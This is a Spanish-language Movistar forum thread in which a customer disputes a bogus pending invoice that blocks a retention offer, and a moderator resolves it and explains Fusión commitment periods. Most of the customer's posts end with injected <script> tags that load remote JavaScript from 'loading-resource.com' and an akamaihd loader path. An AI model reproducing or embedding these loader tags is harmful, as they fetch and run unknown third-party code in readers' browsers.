Problema con Portabilidad

pasitos
Yo probé el VDSL
Problema con Portabilidad

El pasado miércoles día 19 me hicieron una contraoferta por cancelar la portabilidad de mi línea que no tiene permanencia. Aunque con dudas al final acepté una orferta. Me dijeron que el siguiente lunes estaría tramitada y podría recoger en tienda el movil aceptado. Llamo el lunes ya que no habia tenido ninguna noticia y me dicen que estoy en plazo  y que hasta el jueves podria demorarse (se me ha olvidado contar hasta tres).

Lo mejor del caso es que el martes me llega un mensaje del 224472 indicandome que no podian tramitar mi oferta pues tengo una cuenta pendiente (no es cierto ni "jarto vino") que llame al 1004 y luego a ellos. 

Llamo al 1004 y la persona que me atiende no encuentra por ningún lado ninguna deuda mia (no la hay). Me abre él mismo una reclamación.

Hoy me llaman 1004, no puedeo atenderles, les llamo cuando puedo y al final de pasar de un lado a otro sólo para decirme que han mandado la documentación al dep. correspondiente y ya me informarán.

Estoy un poco harto.

Yo no debo absolutamente nada a nadie y menos a movistar.

Lo mejor de todo es que ahora no tengo claro si la oferta que me hicieron y acepté me interese tanto. Cuando uno piensa las cosas mejor las ve de otra manera.

 

Quisiera preguntar al quien pueda y quiera contestarme si, una vez resuelto ese gran error que ha cometido no se quien, puedo renegociar la oferta ya que no me interesa aquella que acepté en su dia. O simplemente la acepto o la rechazo y me porto.

 

Pdta. Aunque les he dicho dónde está el error (lo que no se es como lo han cometido) parece que la maquinaria tiene que dar  muchas vueltas.

 

Un saludo y espero que me respondan a la pregunta.

 

Perdón si me he extendido

Mensaje 1 de 16
1.361 Visitas
15 RESPUESTAS 15
Carmen.S-movistar
Antiguo Moderador

 

 

    Hola @pasitosEmoticono feliz!!

 

Siento lo ocurrido.....

 

Envíame si quieres por un mensaje privado los siguientes datos y compruebo lo ocurrido.

* Nombre/Apellidos
* DNI
* Número de teléfono

    Saludos.



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 2 de 16
1.332 Visitas
pasitos
Yo probé el VDSL

Enviado privado con datos solicitados y algo más de información

 

Gracias.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Mensaje 3 de 16
1.311 Visitas
Carmen.S-movistar
Antiguo Moderador

 

 

    Hola@pasitosEmoticono feliz!!

 

He revisado los datos y te explico:

 

Cada canje, genera una factura y esta que nos consta como "pendiente" está asociada al canje del Galaxy Ace. Realmente no es un importe pendiente...compruebo que tienes una reclamación abierta con el expediente nº 8202668 para anularla, que tu caso no habrá problema para ello (tenemos que esperar a que lo tramiten). De todos modos, cualquier cosa, me dices.

 

Una vez conste la factura anulada, ya se podrá generar la oferta de retención.

 

Con respecto a Fusión, te dejo el hilo con la info de la que disponemos.

 

A lo largo de la semana que viene comprobaré el estado del expediente y te comento, ok?? y despues, ya me confirmas si quieres todavía la oferta de retenGuiño

 

    Siento las molestias...Emoticono avergonzado...

 



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 4 de 16
1.272 Visitas
pasitos
Yo probé el VDSL

Muchas gracias por tu interés.

 

Veo que tenemos horarios complementarios.

 

Al final todo queda como me dijeron. Esperando que se resuelva. La reclamación sigue un cauce pero que me he visto metido en ella sin comerlo ni beberlo.

 

Entiendo que cuando me confirmen que todo está solucionado, me ponga en contacto contigo respecto a la oferta que tengo pendiente?

 

Miraré de nuevo el hilo de fusión pero ya te digo que he leido y oido cosas contradictorias desde el mismo origen. No se a que carta quedarme.

 

 

Un saludo.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Mensaje 5 de 16
1.256 Visitas
Carmen.S-movistar
Antiguo Moderador

 

 

    Hola @pasitosEmoticono feliz!!

 

Cuando tengas contestación sobre el expediente, por favor, coméntanos y si tienes cualquier incidencia con el trámite, tambiénGuiño

 

Con respecto a Fusión, dime cual es la duda e intentaré ayudarte....

 

    Un saludo.



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 6 de 16
1.220 Visitas
pasitos
Yo probé el VDSL

Hola Carmen.S-movistar, gracias por escribir

 

A dia de hoy no he tenido contestación de la incidencia.

 

Pensaba que se tardaba como mucho una semana y ese plazo cumple mañana creo.

 

Respecto a fusión he oido y leido de fuentes teoricamente oficiales versiones contradictorias.

 

Una por ejemplo: Si tengo permanencia pongamos de 18 meses en el movil y me fusiono, al cabo del año, ¿que permanencia tendrá el movil en caso de que me salga de fusión?. Por un lado que cuando acabe fusión el movil sigue con su permanencia y por otro que no, que la permanencia del movil sigue conrriendo en paralelo con la de fusión.

 

Teniendo en cuenta que tengo otra linea de contrato con Vf, y dos en prepago Or,  mi idea es ponerlas todas juntas incluido ADSL. Por tanto tengo que empezar a aclarar que es lo más me conviene hacer. Y empezar a hacer los movimientos necesarios.

 

Espero no haber escrito nada inadecuado.

 

Un saludo.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Mensaje 7 de 16
1.198 Visitas
pasitos
Yo probé el VDSL

Hoy es 3 y creo que ya está más que cumplido el plazo para que se resuelva (¿me equivoco?).

 

¿Que debo hacer? Pillarme el cabreo total y liarme la manta a la cabeza?

 

Tengo que reclamar en otras instancias?

 

Imagino que puede darme alguna información al respecto. ¿Es así?

 

....

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Mensaje 8 de 16
1.149 Visitas
Carmen.S-movistar
Antiguo Moderador

 

 

    Hola @pasitosEmoticono feliz!!

 

Acabo de comprobarlo y efectivamente....no está anulada...si mañana no está hecho cuando llegue, intento gestionarlo, ok?? y ya te cuentoGuiño

 

Fusión: si en el móvil tienes una permanencia y contratas Fusión, lo que desaparece es el GM pero el CP continúa vigente, por ello si por ejemplo, cuando contratas Fusión te quedan 18 meses de permanencia en el móvil y decides no renovar Fusión....has consumido 12 meses de la permancia del móvil y te quedan 6 meses más....

 

No se si he aclarado tus dudas.....



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 9 de 16
1.112 Visitas
pasitos
Yo probé el VDSL

Hola.

Gracias por responder

 

Lo que me ha respondido queda totalmente claro. Eso es lo que habia entendio en el foro pero había oido y leido otras cosas. Repito eso me queda claro.

 

Realmente mi problema es el otro

 

Hasta mañana

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Mensaje 10 de 16
1.089 Visitas
Carmen.S-movistar
Antiguo Moderador

 

 

    Buenos días @pasitosEmoticono feliz!!

 

He pasado de nuevo petición para que se compense el importe de los 39€ y poder gestionar el canje.

 

Siento no poder hacer mucho más.....Emoticono avergonzado...cuando me contesten, te informo.

 

SaludosGuiño



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 11 de 16
1.057 Visitas
pasitos
Yo probé el VDSL

Hola, buenas tardes.

 

Me gustaría saber si he cometido algún "pecado" para recibir este tratamiento por parte de MS.

 

Que yo sepa mi única culpa ha sido aceptar una oferta de una linea prepago. Pagar religiosamente el envio y punto.

 

A raiz de eso soy considerado como moroso (por mala gestión de MS) desde el pasado día 25 de Septiembre (eso que yo sepa).

 

Me abren una reclamación en la que teoricamente se resuelve en menos de 7 dias (probablemente deba aprender de nuevo a contar o cambiar la noción del tiempo) y a día de hoy lo único que puedo saber es que se envia una nueva petición para  que ...   NO LA CUESTIÓN ES QUE YO HICE UNA RECLAMACIÓN e imagino que ha de resolverse.

 

¿A quien debo reclamar?

 

Va a resultar que tiene razón el forero que afirmaba (dice haberlo sufrido en sus carnes) que si sacas un movil en prepago (pagandolo desde luego, si no no lo coges) tienes una factura impagada al menos un mes.

 


Seguramente no hay nadie que pueda entenderlo, yo no, desde luego.

 

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Mensaje 12 de 16
1.040 Visitas
Carmen.S-movistar
Antiguo Moderador

 

 

    Buenos días @pasitosEmoticono feliz!!

 

Me confirman que ya lo han gestionado....Guiño

 

He comprobado tus datos y efectivamente, ya no constan los 39€.

 

Siento la espera....Emoticono avergonzado.....

 

Ahora ya puedes hacer el canje, cualquier cosa nos comentas!!



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 13 de 16
1.009 Visitas
pasitos
Yo probé el VDSL

Hola

Miuchas gracias por responder y por el interés.

 

Imaginaba que me llamarian o me me enviarian un sms. Pero bueno si está arreglado bienvenido sea.

 

Ahora me toca llamar de nuevo el telefono .....2 que me dijeron. ¿Es así? Entiendo que la oferta, despues de tanto tiempo, podrá ser cambiada de común acuerdo. Puedes darme un poco de luz?

 

 

 

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Mensaje 14 de 16
992 Visitas
pasitos
Yo probé el VDSL

Gracias a todos los lectores y a la moderadora por su interes pero

 

DOY POR TERMINADO EL TEMA.

 

Reitero mi agradecimiento.

 

 

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Mensaje 15 de 16
938 Visitas
Carmen.S-movistar
Antiguo Moderador

 

    Hola @pasitosEmoticono feliz!!

 

Acabo de leer tu privado y veo que ya has ejecutado el bono pero finalmente para el Xperia S......

 

Siento no haber podido ayudar más....y te agradezco tus palabras...Guiño

 

Te he enviado un privado, por favor, échale un vistazo cuando tengas un momento.

 

    Saludos.



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 16 de 16
901 Visitas